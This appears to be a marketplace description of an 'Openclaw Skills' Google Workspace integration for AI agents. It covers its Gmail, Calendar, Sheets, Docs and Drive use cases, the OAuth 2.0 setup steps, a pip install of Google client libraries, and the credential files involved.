What is Google Workspace?

The Google Workspace skill is a robust toolkit designed to give your AI agent direct programmatic access to the most essential Google services. By utilizing Openclaw Skills, developers can build agents capable of reading and sending emails, scheduling complex calendar events, managing spreadsheets, and generating documents. This skill acts as a bridge between high-level AI reasoning and the structured data environments of the Google ecosystem.

Built on top of the Google API Python Client, this skill emphasizes security and flexibility. It utilizes OAuth 2.0 for authentication, ensuring that your agent operates within the permissions you define. Whether you are looking to automate your inbox or sync data across Google Sheets, these Openclaw Skills provide the necessary foundation for advanced productivity workflows.

Google Workspace Use Cases

  • Automating email management, including searching for unread invoices and drafting responses in Gmail.
  • Creating, listing, and deleting calendar events to manage schedules autonomously.
  • Maintaining and searching contact lists via the People API for better relationship management.
  • Programmatically reading from and writing data to Google Sheets for automated reporting.
  • Generating and editing Google Docs for project documentation or template filling.
  • Managing file lifecycles in Google Drive, including secure uploads and downloads.

How Google Workspace Works

  1. The user sets up a Google Cloud Project and enables the required APIs for the Openclaw Skills they wish to use.
  2. The openclaw-agent utility is launched on the host machine to handle secure communication and authentication flows.
  3. Python dependencies are installed to interface with the Google API Client Library.
  4. An initial OAuth 2.0 handshake is performed via a browser, generating a token.pickle file for persistent, secure access.
  5. The AI agent executes specific scripts to perform actions like sending an email or updating a sheet, which are processed through the authorized openclaw-agent.
  6. Results and metadata from Google Workspace services are returned to the agent to inform subsequent actions.

Google Workspace Setup

1. Prerequisites

Ensure you have Python 3 installed. You must have the openclaw-agent running on your system for these Openclaw Skills to function.

2. Install Dependencies

pip install google-api-python-client google-auth-httplib2 google-auth-oauthlib

3. Google Cloud Configuration

  1. Visit the Google Cloud Console and create a new project.
  2. Enable the APIs: Gmail, Calendar, Sheets, Docs, Drive, and People API.
  3. Create OAuth 2.0 Credentials (Desktop app) and download the credentials.json file to your workspace.

4. Authentication

Run your authentication helper script to generate the token.pickle file. This will require a one-time browser login to authorize your Openclaw Skills.

Google Workspace Data Schema & Taxonomy

The skill organizes its operations around specific Google resource identifiers and local configuration files:

Data Component Description
credentials.json The client secret file providing the application identity for OAuth.
token.pickle Stores the user's access and refresh tokens for authorized API calls.
SPREADSHEET_ID The unique ID found in the URL of any Google Sheet.
DOCUMENT_ID The unique ID found in the URL of any Google Doc.
MESSAGE_ID The specific identifier for Gmail threads and individual messages.
EVENT_ID The unique identifier for specific Google Calendar entries.

Google Workspace Advanced Features

  • Advanced Gmail filtering using complex search queries like has:attachment or is:unread for precise inbox management.
  • Batch update support for Google Docs, allowing for multiple text replacements or insertions in a single API request.
  • Seamless data flow between services, such as extracting Gmail data and appending it directly to a Google Sheet.
  • Support for custom OAuth scopes, enabling developers to restrict Openclaw Skills to only the data they need.
  • Robust file handling in Google Drive, supporting media uploads and chunked downloads for large files.
